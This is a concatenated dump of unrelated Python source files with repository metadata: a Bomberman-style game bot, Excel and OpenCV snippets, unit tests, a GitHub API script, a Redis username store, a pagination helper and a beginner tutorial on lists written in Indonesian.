posx, posy = 0, 0
isCrateFound = False
mdist = 30
if len(crates) == 0:
isCrateFound = True
posx = random.randint(0,13)
posy = random.randint(0,11)
elif len(crates) == 1:
isCrateFound = True
posx = crates[0].x
posy = crates[0].y
else:
while not isCrateFound:
if random:
# Choose randomly a crate to bomb
crate = crates[random.choice(list(crates.keys()))]
isCrateBomb = False
for k, crate_bomb in crates_bombs.items():
if crate.x == crate_bomb[0] and crate.y == crate_bomb[1]:
isCrateBomb = True
break
if isCrateBomb:
continue
else:
isCrateFound = True
posx = crate.x
posy = crate.y
else:
for k, crate in crates.items():
# Is the crate already have a bomb next to it?
isCrateBomb = False
for kk, crate_bomb in crates_bombs.items():
if crate.x == crate_bomb[0] and crate.y == crate_bomb[1]:
isCrateBomb = True
break
if isCrateBomb:
continue
else:
dx, dy = distance(hero, crate.x, crate.y)
dist = dx + dy
if dist < mdist:
posx = crate.x
posy = crate.y
mdist = dist
return posx, posy
def find_ups_onboard(hero, obj_ups):
dmin = 10
posx = 0
posy = 0
isUpClose = False
for k,ups in obj_ups.items():
dx = hero.x - ups.x
dy = hero.y - ups.y
if math.sqrt(dx*dx + dy*dy) < dmin:
posx = ups.x
posy = ups.y
dmin = math.sqrt(dx*dx + dy*dy)
isUpClose = True
return isUpClose, posx, posy
def find_bot_onboard(hero, bots):
posx, posy = 0,0
isBotNear = False
for k, bot in bots.items():
dx = hero.x - bot.x
dy = hero.y - bot.y
if (math.fabs(dx) < hero.bomb_reach and dy == 0) or (math.fabs(dy) < hero.bomb_reach and dx == 0):
isBotNear = True
posx = bot.x
posy = bot.y
return isBotNear, posx, posy
def find_bombs_onboard(hero, bombs):
bomb_range = None
posx, posy = 0,0
isHeroInDanger = False
for k,bomb in bombs.items():
bomb_range = bomb.param_2 - 1
bomb_timer = bomb.param_1
bomb_constraint = 2 #max(bomb_range, ebomb_timer)
dx = hero.x - bomb.x
dy = hero.y - bomb.y
if (dy == 0 or dx == 0) or (dy == 1 or dx == 1):
#if (math.fabs(dx) < ebomb_constraint and dy == 0) or (math.fabs(dy) < ebomb_constraint and dx == 0):
isHeroInDanger = True
posx = bomb.x
posy = bomb.y
return isHeroInDanger, posx, posy, bomb_range
##### CLASSES #####
# Creating Class entity
class Entity():
def __init__(self, entity_type=0, owner=0, x=0, y=0, param_1=0, param_2=0):
self.entity_type = entity_type
self.owner = owner
self.x = int(x)
self.y = int(y)
self.param_1 = param_1
self.param_2 = param_2
class Hero(Entity):
# Saving HERO previous position
past_x = 0
past_y = 0
bomb_reach = 2
bomb_previous_turn = False
def __init__(self, entity_type=0, owner=0, x=0, y=0, param_1=0, param_2=0):
super().__init__(entity_type=0, owner=0, x=0, y=0, param_1=0, param_2=0)
# Methods related to crates
def move_to_crate(self, posx, posy):
print("MOVE", posx, posy, sep=" ")
def bomb_crate(self, posx, posy):
print("BOMB", posx, posy, sep=" ")
def next_to_a_crate(self, crates, crates_bombs):
isHeroNextCrate = False
posx_crate, posy_crate = None, None
for k, crate in crates.items():
# Is there a crate next to HERO?
if (math.fabs(hero.x - crate.x) == 1 and hero.y == crate.y) or (math.fabs(hero.y - crate.y) == 1 and hero.x == crate.x):
print("HERO next to crate... can we bomb?", file=sys.stderr)
#Is there already a bomb with the crate?
isCrateBomb = False
for kk, crate_bomb in crates_bombs.items():
if crate.x == crate_bomb[0] and crate.y == crate_bomb[1]:
isCrateBomb = True
break
if isCrateBomb:
continue
else:
isHeroNextCrate = True
posx_crate, posy_crate = crate.x, crate.y
hero.bomb_previous_turn = True
break
return isHeroNextCrate, posx_crate, posy_crate
# Methods related to Bombs
def bomb_under(self, bombs):
isBombUnderHero = False
for k, bomb in bombs.items():
if (hero.x == bomb.x and hero.y == bomb.y):
isBombUnderHero = True
break
return isBombUnderHero
# Methods related to Ups
def move_to_ups(self, posx, posy):
print("MOVE", posx, posy, sep=" ")
# Methods related to Enemy Bombs
def move_away_from_bombs(self, posx_bomb, posy_bomb, grid, ebomb_reach=2):
posx = 0
posy = 0
deplx = 1 if self.x + 1 < width - 1 else -1
deply = 1 if self.y + 1 < height - 1 else -1
dx = self.x - posx_bomb
dy = self.y - posy_bomb
if dx == 0:
# Hero and bot bomb on same column.
# Need to move Hero to next column
posx = self.x + 1 if self.x + 1 < width - 1 else self.x - 1
if dy > 0:
posy = self.y + 1 if self.y + 1 < height-1 else self.y - 1
else:
posy = self.y - 1 if self.y - 1 > 0 else self.y + 1
# Is not square available?
if grid[posy, posx] != '.':
posy = self.y + 2 if self.y + 2 < height - 1 else self.y - 2
elif dy == 0:
if dx > 0:
posx = self.x + 1 if self.x + 1 < width - 1 else self.x - 1
else:
posx = self.x - 1 if self.x - 1 > 0 else self.x + 1
posy = self.y + 1 if self.y + 1 < height-1 else self.y - 1
if grid[posy, posx] != '.':
posx = self.x + 2 if self.x + 2 < width - 1 else self.x - 2
else:
print("already in safe place, do not move", file=sys.stderr)
posx = self.x
posy = self.y
print("MOVE", posx, posy, sep=" ")
# Creating wall class
class Wall():
def __init__(self, x, y):
self.x = x
self.y = y
# Dictionary saving position of all Walls on the board
walls = {}
isWall = True
nwalls = 0
# Creating Class crate
class Crate:
def __init__(self, x, y, crate_obj):
self.x = x
self.y = y
self.obj = crate_obj
##### START GAME #####
# Set grid dimensions and HERO id
width, height, my_id = [int(i) for i in input().split()]
# Saving the grid in a matrix
grid = np.array([['.' for j in range(width)] for i in range(height)])
# Creating hero entity
hero = Hero(entity_type=0, owner=my_id)
# game loop
while True:
print('Turn begins...', file=sys.stderr)
# Dictinary saving the crates
crates_dict = {}
ncrate = 0
for i in range(height):
row = input()
# Populating the grid
for j in range(width):
grid[i,j] = row[j]
# Populating the Crates
if row[j] != '.' and row[j] != 'X':
crates_dict[ncrate] = Crate(j, i, row[j])
ncrate += 1
if isWall:
# Populating the Walls
if row[j] == 'X':
walls[nwalls] = Wall(j,i)
nwalls += 1
print('Crates and wall populated...', file=sys.stderr)
# Setting Wall flag to False so we do not populate the dict next turn (wall
# position won't move)
isWall = False
isHeroOnABomb = False
# Dictionaries saving each entity types
all_bombs = {}
bots = {}
obj_ups = {}
nb_bombs = 0
nups = 0
nbots = 0
# Entities
entities = int(input())
print("entities loaded", entities, sep=" ", file=sys.stderr)
for i in range(entities):
entity_type, owner, x, y, param_1, param_2 = [int(j) for j in input().split()]
# Populating each entity dictionaries
print("entities split", entity_type, owner, x, y, param_1, param_2, sep=" ", file=sys.stderr)
if entity_type == 0:
if owner == my_id:
if isFirstTurn:
hero.x = x
hero.y = y
isFirstTurn = False
else:
hero.past_x = hero.x
hero.past_y = hero.y
hero.x = x
hero.y = y
hero.param_1 = param_1
hero.param_2 = param_2
else:
bots[nbots] = Entity(entity_type, owner, x, y, param_1, param_2)
nbots += 1
print("entities bot or hero", file=sys.stderr)
if entity_type == 2:
obj_ups[nups] = Entity(entity_type, owner, x, y, param_1, param_2)
nups += 1
print("entities up", file=sys.stderr)
if entity_type == 1:
all_bombs[nb_bombs] = Entity(entity_type, owner, x, y, param_1, param_2)
nb_bombs += 1
print("bomb added", file=sys.stderr)
if hero.x == x and hero.y == y:
isHeroOnABomb = True
print("hero on bomb", file=sys.stderr)
if owner == my_id:
hero.bomb_reach = param_2-1
print("reach bomb", file=sys.stderr)
print('Entities done...', file=sys.stderr)
# Populating the crates with near bomb dictionary
crates_bombs = {}
nb_crate_bomb = 0
for k, crate in crates_dict.items():
for k, bomb in all_bombs.items():
if math.fabs(bomb.x-crate.x) == 1 or math.fabs(bomb.y-crate.y) == 1:
crates_bombs[nb_crate_bomb] = [crate.x, crate.y]
print('crates and crates bomb done...', file=sys.stderr)
'''
##### HERO Actions #####
-- is HERO threaten by bombs?
yes -- go to safe place
no -- HERO attacks: does HERO has bomb left?
yes -- is there VILLAIN closeby?
yes -- BOMB VILLAIN
no -- is there CRATE nearby?
yes -- is there wall between HERO and CRATE?
yes -- [repeat - is there CRATE nearby]
no -- BOMB CRATE
no -- is there UPs nearby?
yes -- MOVE UP
no -- MOVE RANDOM CRATE
no -- go to safe place or RANDOM CRATE
'''
print("Starting Turn Action...", file=sys.stderr)
if isFirstBomb:
print("Putting first Bomb", file=sys.stderr)
posx_crate, posy_crate = find_crate(crates_dict, crates_bombs, random=False)
hero.bomb_crate(posx_crate, posy_crate)
isFirstBomb = False
else:
if len(all_bombs) != 0:
print("Bombs are on board", file=sys.stderr)
isHeroInDanger, posx_bomb, posy_bomb, ebomb_range = find_bombs_onboard(hero, bombs)
if isHeroInDanger:
# HERO plays defence
hero.move_away_from_bombs(posx_bomb, posy_bomb, grid, ebomb_range)
print("HERO DANGER", file=sys.stderr)
else:
if hero.param_1 != 0:
# HERO plays attack
isBotNear, posx_bot, posy_bot = find_bot_onboard(hero,bots)
if isBotNear:
print("BOMB", posx_bot, posy_bot, sep=" ")
else:
if len(crates_dict) == 0:
print("No more crates", file=sys.stderr)
print("MOVE", hero.x, hero.y, sep=" ", file=sys.stderr)
else:
# HERO close to crate?
print(hero.bomb_previous_turn, isHeroOnABomb, sep=" ", file=sys.stderr)
isHeroNextCrate = False
if not hero.bomb_previous_turn and not isHeroOnABomb:
isHeroNextCrate, posx_crate, posy_crate = hero.next_to_a_crate(crates_dict, crates_bombs)
if isHeroNextCrate:
hero.bomb_crate(posx_crate, posy_crate)
hero.bomb_previous_turn = False
else:
if len(obj_ups) != 0:
isUpClose, posx_up, posy_up = find_ups_onboard(hero, obj_ups)
if isUpClose:
hero.move_to_ups(posx_up, posy_up)
isUpClose = False
else:
posx_crate, posy_crate = find_crate(crates_dict, crates_bombs, random=False)
hero.move_to_crate(posx_crate, posy_crate)
else:
posx_crate, posy_crate = find_crate(crates_dict, crates_bombs)
hero.move_to_crate(posx_crate, posy_crate)
| true |
f5bab6780a5ba489fea477073aa36b947ef21227 | Python | tomithy/GSOC-2012-Demo | /Archive/PhyloXMLGenerator.py | UTF-8 | 922 | 2.921875 | 3 | [] | no_license | from lxml import etree
def buildXml():
root = etree.Element("root", interesting="totally")
root.append( etree.Element("child1") )
etree.SubElement(root, "child").text = "Child 1"
etree.SubElement(root, "child").text = "Child 2"
etree.SubElement(root, "another").text = "Child 3"
# root.insert(0, etree.Element("Child0"))
child2 = root[1]
etree.SubElement(child2, "Child0ofchild2").text = "HelloWorld"
child0ofChild2 = child2[0]
etree.SubElement(root, "Inbrackets").text = "Here we go"
anotherElement = etree.Element("AppedTest")
anotherElement.text = "Another Text"
root[1][0].append(anotherElement)
# root.text = "TEXT"
for child in root:
print child.tag
print etree.tostring(root, pretty_print=True)
# creates a folder clade and adds it to the passed it parent
def addFolderClade(parent, foldername, uri="", tooltip=""):
pass
| true |
6eddfc04583b8a406f63975a1ef31dae7cce9dbd | Python | dxc7528/Python_MachineLearning | /python.py | UTF-8 | 5,778 | 2.953125 | 3 | [] | no_license | python
convert Excel to PDF
## Author: Sirvan Almasi Jan 2017
## This script helps in automating the process of converting an excel into PDF
import win32com.client, time
o = win32com.client.Dispatch("Excel.Application")
o.Visible = False
timedate = time.strftime("%H%M__%d_%m_%Y")
wb_path = r'S:/GSA Euro Research Company Files/Property Sectors/Euro Office Sector/London Offices/Green Street Research Reports/London Office Report Feb 17/_5. Appendix - Company Snapshots - Copy.xlsm'
#wb_path = r'C:/Users/salmasi/Documents/MATLAB/xlstopdf/22.xlsm'
wb = o.Workbooks.Open(wb_path)
ws_index_list = [1,2,3] #say you want to print these sheets
path_to_pdf = r'C:/Users/salmasi/Documents/MATLAB/xlstopdf/app__'+str(timedate)+'.pdf'
wb.WorkSheets(ws_index_list).Select()
wb.ActiveSheet.ExportAsFixedFormat(0, path_to_pdf)
wb.Close(True)
copy entire excel worksheet to a new worksheet using Python win32com
# old_sheet: sheet that you want to copy
old_sheet.Copy(pythoncom.Empty, workbook.Sheets(workbook.Sheets.Count)
new_sheet = workbook.Sheets(workbook.Sheets.Count)
new_sheet.Name = 'Annual'
Instead of using the PrintOut method, use ExportAsFixedFormat. You can specify the pdf format and supply a file name. Try this:
ws.ExportAsFixedFormat(0, 'c:\users\alex\foo.pdf')
Print chosen worksheets in excel files to pdf in python
import win32com.client
o = win32com.client.Dispatch("Excel.Application")
o.Visible = False
wb_path = r'c:\user\desktop\sample.xls'
wb = o.Workbooks.Open(wb_path)
ws_index_list = [1,4,5] #say you want to print these sheets
path_to_pdf = r'C:\user\desktop\sample.pdf'
wb.WorkSheets(ws_index_list).Select()
wb.ActiveSheet.ExportAsFixedFormat(0, path_to_pdf)
Opencv and python for auto cropping
If you want to do this with OpenCV, a good starting point may be after doing some simple processing to remove noise and small details in the image, you can find the edges of the image and then find the bounding box and crop to that area. But in case of your second image, you may need to do some post-processing as the raw edges may hold some noise and borders. You can do this on a pixel-by-pixel basis, or another maybe overkill method would be finding all the contours in the image and the finding the biggest bounding box. Using this you can get the following results: First Image
And for the second one:
Second Image
The part that needs work is finding a proper thresholding method that works for all the images. Here I used different thresholds to make a binary image, as the first one was mostly white and second one was a bit darker. A first guess would be using the average intensity as a clue.
Hope this helps!
This is how I used some pre-processing and also a dynamic threshold to get it work for both of the images:
im = cv2.imread('cloth.jpg')
imgray = cv2.cvtColor(im,cv2.COLOR_BGR2GRAY)
imgray = cv2.blur(imgray,(15,15))
ret,thresh = cv2.threshold(imgray,math.floor(numpy.average(imgray)),255,cv2.THRESH_BINARY_INV)
dilated=cv2.morphologyEx(thresh, cv2.MORPH_OPEN, cv2.getStructuringElement(cv2.MORPH_ELLIPSE,(10,10)))
_,contours,_ = cv2.findContours(dilated,cv2.RETR_LIST,cv2.CHAIN_APPROX_SIMPLE)
I also checked the contour area to remove very large contours:
new_contours=[]
for c in contours:
if cv2.contourArea(c)<4000000:
new_contours.append(c)
The number 4000000 is an estimation of the image size (width*height), big contours should have an area close to the image size.
Then you can iterate all the contours, and find the overall bounding box:
best_box=[-1,-1,-1,-1]
for c in new_contours:
x,y,w,h = cv2.boundingRect(c)
if best_box[0] < 0:
best_box=[x,y,x+w,y+h]
else:
if x<best_box[0]:
best_box[0]=x
if y<best_box[1]:
best_box[1]=y
if x+w>best_box[2]:
best_box[2]=x+w
if y+h>best_box[3]:
best_box[3]=y+h
Then you have the bounding box of all contours inside the best_box array.
https://stackoverflow.com/questions/37803903/opencv-and-python-for-auto-cropping
How to detect edge and crop an image in Python
What you need is thresholding. In OpenCV you can accomplish this using cv2.threshold().
I took a shot at it. My approach was the following:
Convert to grayscale
Threshold the image to only get the signature and nothing else
Find where those pixels are that show up in the thresholded image
Crop around that region in the original grayscale
Create a new thresholded image from the crop that isn't as strict for display
Here was my attempt, I think it worked pretty well.
import cv2
import numpy as np
# load image
img = cv2.imread('image.jpg')
rsz_img = cv2.resize(img, None, fx=0.25, fy=0.25) # resize since image is huge
gray = cv2.cvtColor(rsz_img, cv2.COLOR_BGR2GRAY) # convert to grayscale
# threshold to get just the signature
retval, thresh_gray = cv2.threshold(gray, thresh=100, maxval=255, type=cv2.THRESH_BINARY)
# find where the signature is and make a cropped region
points = np.argwhere(thresh_gray==0) # find where the black pixels are
points = np.fliplr(points) # store them in x,y coordinates instead of row,col indices
x, y, w, h = cv2.boundingRect(points) # create a rectangle around those points
x, y, w, h = x-10, y-10, w+20, h+20 # make the box a little bigger
crop = gray[y:y+h, x:x+w] # create a cropped region of the gray image
# get the thresholded crop
retval, thresh_crop = cv2.threshold(crop, thresh=200, maxval=255, type=cv2.THRESH_BINARY)
# display
cv2.imshow("Cropped and thresholded image", thresh_crop)
cv2.waitKey(0) | true |
86ea7f7f8cc8fba6249115f16824e7413261364a | Python | HaigangLiu/gyro-city-xrays | /test/test_helper_function.py | UTF-8 | 2,061 | 3.265625 | 3 | [] | no_license | import unittest
from helper_functions import sampler_imbalanced, compute_cross_entropy_weights, f1_calculator_for_confusion_matrix
import pandas as pd
import numpy as np
from sklearn.metrics import f1_score, confusion_matrix
from data_utilities import DataConstructor
class TestHelperFunctions(unittest.TestCase):
def test_sampler_imbalanced(self):
fake_labels = np.random.choice(2,150, int)
sampler = sampler_imbalanced(fake_labels)
ratio_of_ones = sum(fake_labels)/len(fake_labels)
prob_of_zero = 1 - ratio_of_ones
# if there is 1, 1, 0. then the prob to sample 1 is set to 1/3. The expected number of sample will be 2x1/3 = 2/3. The expected number of zeros is going to be 1*2/3 = 2/3. Hence they are equally likely to be sampled.
for i, j in zip(fake_labels, sampler.weights):
if i == 1:
self.assertAlmostEqual(ratio_of_ones/(1 - ratio_of_ones), 1/j.item())
def test_f1_calculator_for_confusion_matrix(self):
y_true = np.array([0,1,1,1,1,1,1, 0, 0])
y_pred = np.array([1,1,1,1,1,1,1, 0, 0])
matrix = np.array([[2, 1], [0, 6]])
f1 = f1_calculator_for_confusion_matrix(matrix)
f1_standard = f1_score(y_true, y_pred)
self.assertAlmostEqual(f1, f1_standard)
def test_compute_cross_entropy_weights(self):
DATA_DIR = "/Users/haigangliu/ImageData/ChestXrayData/"
info_dir = '/Users/haigangliu/ImageData/Data_Entry_2017.csv'
image_info = pd.read_csv(info_dir).iloc[0:1000,:]
random_labels = np.random.randint(0, 2, image_info.shape[0], int)
image_info['labels'] = random_labels
torch_data_set = DataConstructor(DATA_DIR, image_info)
positive_percentage = sum(random_labels)/image_info.shape[0]
weights = compute_cross_entropy_weights(torch_data_set)
self.assertAlmostEqual(weights[0], positive_percentage, places = 4)
self.assertAlmostEqual(weights[1], 1-positive_percentage, places = 4)
if __name__ == '__main__':
unittest.main()
| true |
aff718b6b589a880226012faa19b2977ccfde9a7 | Python | ZombieSave/Python | /Методы сбора и обработки данных из сети Интернет/Урок1/Задание1.py | UTF-8 | 923 | 3.296875 | 3 | [] | no_license | # 1. Посмотреть документацию к API GitHub, разобраться как вывести список репозиториев для конкретного пользователя,
# сохранить JSON-вывод в файле *.json.
import requests
import json
print("Имя пользователя:")
userName = input()
url = f"https://api.github.com/users/{userName}/repos"
headers = {"Accept": "application/vnd.github.v3+json"} # рекоммендовано в разделе Resources in the REST API
response = requests.get(url, headers=headers)
print(f"Status code: {response.status_code}")
if response.status_code == 200:
repositories = response.json()
with open(f"Repositories_{userName}.json", "w") as file:
json.dump(repositories, file)
print(f"List of repositories of user {userName}:")
for repos in repositories:
print(repos["name"])
| true |
964715d854155428576c3f9179291ab2fb8b045d | Python | ratularora/tkinter-programs-in-python | /4check.py | UTF-8 | 326 | 2.84375 | 3 | [] | no_license | import Tkinter
import os
a=Tkinter.Tk()
a.title("test")
a.geometry("150x100")
a.configure(bg="yellow")
v1=Tkinter.IntVar()
c=0
def func():
global c
c=c+1
if(c%2!=0):
os.system("firefox &")
else:
os.system("pkill firefox")
c1=Tkinter.Checkbutton(a,text="firefox",bg="yellow",command=func)
c1.pack()
a.mainloop()
| true |
d4312f5f3af89768aae58525163f1692acc760dc | Python | cpsleme/BestRouteApp | /cli.py | UTF-8 | 1,946 | 3.375 | 3 | [] | no_license | import sys
import re
from model import GraphBase
def output_bestroute(result_input):
"""
Print origin and best route result
input: origin, result
output: formatted best route
"""
if len(result_input) == 0:
return "No routes founded."
separator = " - "
result_print = ""
for item in result_input["Path"]:
if result_print == "":
result_print = item
else:
result_print = result_print + separator + item
result_print = result_print + " > $" + str(result_input["Cost"])
return result_print
if __name__ == '__main__':
parameters = sys.argv
if len(parameters) < 2:
print(f"Please, type: python cli.py <file.csv>")
sys.exit(0)
if parameters[1] in ['help', '-h', '--help']:
print(f"Please, type: python cli.py <file.csv>")
sys.exit(0)
# Test and load files
filecsv = parameters[1]
route_db = GraphBase(filecsv)
if not route_db.conn() or not route_db.hasvertices():
print(f"Please, type a valid csv file.")
sys.exit(0)
else:
print(f"Initial routes added from file {filecsv}.")
input_pattern = r"[A-Z]{3}-[A-Z]{3}$"
# Infinite looping for input routes
while 1:
input_route = input("please enter the route (bye to exit): ")
if input_route.lower() == "bye":
sys.exit()
input_route = input_route.upper()
if bool(re.match(input_pattern, input_route)):
start, finish = input_route.split("-")
if start == finish:
print("Origin is equal destiny, please enter a valid route.")
else:
result = route_db.shortest_route(start, finish)
print(output_bestroute(result))
else:
print("")
print("please enter a route, example: GRU-CDG")
| true |
96884bbf4f9cc325fe2134e67adce00040aa323e | Python | yxlwfds/flask-Mxonline | /app/utils/utils.py | UTF-8 | 3,603 | 3.078125 | 3 | [] | no_license | from math import ceil
from string import ascii_letters
import random
def createsuperuser():
from app.models import User, Role
from app import db
Role.insert_roles()
user = input("please input super user:")
result = User.query.filter_by(username=user).first()
while result:
user = input("please input again:")
result = User.query.filter_by(username=user).first()
passwd = input("please input password:")
u = User()
u.username = user
u.name = user
u.confirmed = True
role = Role.query.filter_by(name='Administrator').first()
u.role = role
u.password = passwd
db.session.add(u)
db.session.commit()
class Pagination(object):
def __init__(self, page, per_page, items=None):
#: the current page number (1 indexed)
self.page = page
#: the number of items to be displayed on a page.
self.per_page = per_page
#: the total number of items matching the query
self.total = len(items)
#: the items for the current page list data
self.items = items
@property
def pages(self):
"""The total number of pages"""
if self.per_page == 0:
pages = 0
else:
pages = int(ceil(self.total / self.per_page))
return pages
@property
def prev_num(self):
"""Number of the previous page."""
if not self.has_prev:
return None
return self.page - 1
@property
def has_prev(self):
"""True if a previous page exists"""
return self.page > 1
@property
def has_next(self):
"""True if a next page exists."""
return self.page < self.pages
@property
def next_num(self):
"""Number of the next page"""
if not self.has_next:
return None
return self.page + 1
def iter_pages(self, left_edge=2, left_current=2,
right_current=5, right_edge=2):
"""
{% macro render_pagination(pagination, endpoint) %}
<div class=pagination>
{%- for page in pagination.iter_pages() %}
{% if page %}
{% if page != pagination.page %}
<a href="{{ url_for(endpoint, page=page) }}">{{ page }}</a>
{% else %}
<strong>{{ page }}</strong>
{% endif %}
{% else %}
<span class=ellipsis>…</span>
{% endif %}
{%- endfor %}
</div>
{% endmacro %}
"""
last = 0
for num in range(1, self.pages + 1):
if num <= left_edge or (num > self.page - left_current - 1 and num < self.page + right_current) or \
num > self.pages - right_edge:
if last + 1 != num:
yield None
yield num
last = num
@property
def get_items(self):
if self.page == 1:
data = self.items[:self.per_page]
elif self.page == self.pages:
data = self.items[self.per_page * (self.page - 1):]
else:
data = self.items[self.per_page * (self.page - 1):self.per_page * self.page]
return data
def random_verify_code(code_length=8):
seed_source = ascii_letters + '0123456789'
result = ""
for num in range(code_length):
index = random.randint(0, len(seed_source) - 1)
result += seed_source[index]
return result
if __name__ == "__main__":
print(random_verify_code())
| true |
89d2dc8a71f3a0ed68b73c7b339f48488de9f996 | Python | claudiosouzabrito/UFPB | /PO/po.py | UTF-8 | 2,342 | 3.0625 | 3 | [] | no_license | '''
DISCIPLINA DE PESQUISA OPERACIONAL: PROJETO 1
PROFESSOR: TEOBALDO LEITE BULHOES JUNIOR
ALUNOS:
Caio Victor do Amaral Cunha Sarmento - 20170021332
Claudio Souza Brito - 20170023696
Gabriel Teixeira Patrício - 20170170889
'''
from __future__ import print_function
from ortools.linear_solver import pywraplp
file = open("instance5.txt", "r") #Abre o arquivo de entrada
lines = file.readlines()
vertices = int(lines[0])
arcs = int(lines[1])
origins = int(lines[2])
escoadores = int(lines[3])
start_nodes = []
end_nodes = []
capacities = []
supplies = [0] * vertices
unit_costs = []
var_arcos = [0] * (arcs + 1)
constraint = [0] * vertices
for line in lines[4:]:
line = list(map(int, line.split(' ',)))
start_nodes.append(line[0])
end_nodes.append(line[1])
capacities.append(line[2])
unit_costs.append(0)
#transformando em PFCM
start_nodes.append(escoadores)
end_nodes.append(origins)
capacities.append(10000) #"infinito kkkk"
unit_costs.append(-1)
# Adaptando para modelagem de programacao linear, e uso do solver de programacao linear
solver = pywraplp.Solver('LinearProgrammingExample',
pywraplp.Solver.GLOP_LINEAR_PROGRAMMING)
# Criando as variaveis(arcos) e limitando entre 0 e capacidade maxima (definida no problema).
for i in range(len(var_arcos)):
var_arcos[i] = solver.NumVar(0, capacities[i], str(i))
# Definindo as restricoes, a soma dos fluxos que entra em um vertice eh igual a soma dos fluxoes que saem
for i in range(vertices):
constraint[i] = solver.Constraint(0,0)
for j in range(len(start_nodes)):
if(start_nodes[j] == i):
constraint[i].SetCoefficient(var_arcos[j], -1)
for k in range(len(end_nodes)):
if(end_nodes[k] == i):
constraint[i].SetCoefficient(var_arcos[k], 1)
# Criando funcao objetiva: somatorio de todos os fluxos dos arcos vezes o custo deles
objective = solver.Objective()
for i in range(len(var_arcos)):
objective.SetCoefficient(var_arcos[i], unit_costs[i])
objective.SetMinimization()
solver.Solve()
opt_solution = 0
print("arcos nao nulos:")
for i in range(len(var_arcos)):
opt_solution = opt_solution + unit_costs[i]*var_arcos[i].solution_value()
if(var_arcos[i].solution_value() != 0):
print("arco: ", start_nodes[i], "-> ", end_nodes[i], ": ", var_arcos[i].solution_value())
print('Solucao otimizada =', -1*opt_solution)
| true |
b8ad8114c3bcfcc321dd5f279772beda3a7d1657 | Python | pippy360/zniki | /database/usernameDatabase.py | UTF-8 | 676 | 2.65625 | 3 | [] | no_license | import redis
keyFormat = 'username_{0}'
username_list_key = 'all_username_list'
usernameRedisDB = redis.StrictRedis( '127.0.0.1', 6379 )
def getAllUsernames():
return usernameRedisDB.lrange(username_list_key, 0, -1)
def addUsername(username, userId):
usernameRedisDB.lpush(username_list_key, username)
key = _usernameKey(username)
usernameRedisDB.set(key, userId)
def removeUsername(username):
usernameRedisDB.lrem(username_list_key, 0, username)
key = _usernameKey(username)
usernameRedisDB.delete(key)
def getUsernameUserId(username):
key = _usernameKey(username)
return usernameRedisDB.get(key)
def _usernameKey(username):
return keyFormat.format(username)
| true |
557b99eb7635015a858e546a037e6d916b269ac7 | Python | pengwa1234/unbuntuCode | /process/copyFile.py | UTF-8 | 759 | 2.984375 | 3 | [] | no_license | from multiprocessing import Pool
import os
import time
def copyFile(name,oldFileName,newFileName):
print("read file start")
fr=open(oldFileName+os.sep+name,"r")
content=fr.read()
fw=open(newFileName+os.sep+name,"w")
print("write file start")
fw.write(content)
fr.close()
fw.close()
def main():
oldFileName=input("请输入旧的文件夹名字:")
newFileName=oldFileName+"复件"
#print(newFileName)
os.mkdir(newFileName)
filenames=os.listdir(oldFileName)
print(filenames)
pool=Pool(5)
for name in filenames:
print("文件名是%s"%name)
pool.apply_async(copyFile,args=(name,oldFileName,newFileName))
pool.close()
pool.join()
if __name__=="__main__":
main()
| true |
3ee0f2b9bffc70d9dbb36f17bc26d8bf7bc6fda7 | Python | zacky131/PythonProgramming | /Pyhton Teaching/Belajar Python untuk pemula/Lesson_3_List_script.py | UTF-8 | 2,957 | 3.84375 | 4 | [
"MIT"
] | permissive | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Oct 18 22:24:03 2018
@author: zacky
"""
'''
Halo semua apa kabar, kembali lagi bersama saya untuk melanjutkan tutorial
Python bagian ketiga .Kali ini saya akan membahas mengenai list di Python.
Apakah itu lists? list adalah kumpulan dari beberapa items yang mengikuti
urutan tertentu. Kita dapat membuat apa saja di dalam list, meliputi huruf, angka
dan sebagainya. Dalam Python, tanda braket kotak ([]) mengindikasinkan list.
Setiap element di dalam list dipisahkan oleh tanda kommma.
Untuk lebih jelas mari kita lihat contoh di bawah ini
'''
kendaraan = ['mobil', 'motor', 'becak', 'kereta', 'bus', 'pesawat terbang', 'perahu']
#print(kendaraan)
'''
Jika kita memerintahkan Python untuk print list, maka hasilnya akan kembali ke pada list
tersebut termasuk tanda kurung kotak nya. Oleh karena itu, mari kita mencoba hal lain,
misalnya untuk mengakses element di dalam list tersebut.
'''
#Mengakses element di dalam list
'''
List adalah koleksi element yang terurut, sehingga kita dapat memerintahkan Python
posisi ataupun index dari item yang diinginkan. Untuk mengaksesnya, kita dapat menulis
nama dari list tersebut, diikuti oleh index di dalam tanda kurung kotak ([])
'''
print(kendaraan[0]) #beri contoh untuk yang lain dan jelaskan
'''
Index posisi dimulai dari angka 0 hingga element list terakhir, jika melebihinya
akan ada peringatan error
'''
print(kendaraan[-1])
'''
untuk mengakses list, dapat pula dari arah berlawanan atau dari list terakhir
dengan memberi tanda negative pada index yang di inginkan
'''
# Menggunakan nilai individual dari dalam list
kalimat = "Kendaraan yang sering saya gunakan adalah " + kendaraan[1].title() + "."
print(kalimat)
# Mengubah, menambah dan menghapus element di dalam list
mobil = ['Toyota', 'Honda', 'Volkswagen', 'BMW', 'Mercedes']
print (mobil)
'''
Item pertama adalah Toyota, bagaimana kita mengubahnya?
'''
# Mengubah element di dalam list
mobil[0] = 'Esemka'
print(mobil)
# Menambah element di dalam list
mobil.append('Suzuki')
print(mobil)
'''
Metode append() memudahkan kitu untuk membuat list secara dinamik
'''
motor = []
motor.append('honda')
motor.append('yamaha')
motor.append('vespa')
print(motor)
## Menyisipi element kedalam list
#motor.insert(0, 'ducati')
#print(motor)
## Menghapus element dalam list
#del motor[1]
#print (motor)
## Menghapus element dengan metode lain pop()
#'''
#metode pop() akan menghapus element yang paling akhir
#'''
#popped_motor = motor.pop()
#print (motor)
## Menghapus dengan pop() di posisi manapun
#motor_pertama = motor.pop(0)
# Menghapus element berdasarkan nilai
motor = ['honda', 'yamaha', 'suzuki', 'ducati']
print (motor)
motor.remove('yamaha')
print(motor)
# Mengorganisasikan list
mobil = ['ford', 'audi', 'chevrolet', 'subaru']
mobil.sort() # berdasarkan alfabet
print(mobil)
mobil.sort(reverse=True)
print(mobil)
# Mengetahui panjangnya list
print(len(mobil))
| true |
8957be7385185c33f9441b0c601fb8cc1b4d3290 | Python | evaportelance/generalized_wug_experiment | /human_generalization/experiments/03_experiment/stimuli/experiment3-make_stimuli.py | UTF-8 | 1,518 | 2.578125 | 3 | [] | no_license |
nonce_file = "./pilot-nonce-roots.txt"
noun_file = "./pilot-noun-contexts.txt"
verb_file = "./pilot-verb-contexts.txt"
adjective_file = "./pilot-adjective-contexts.txt"
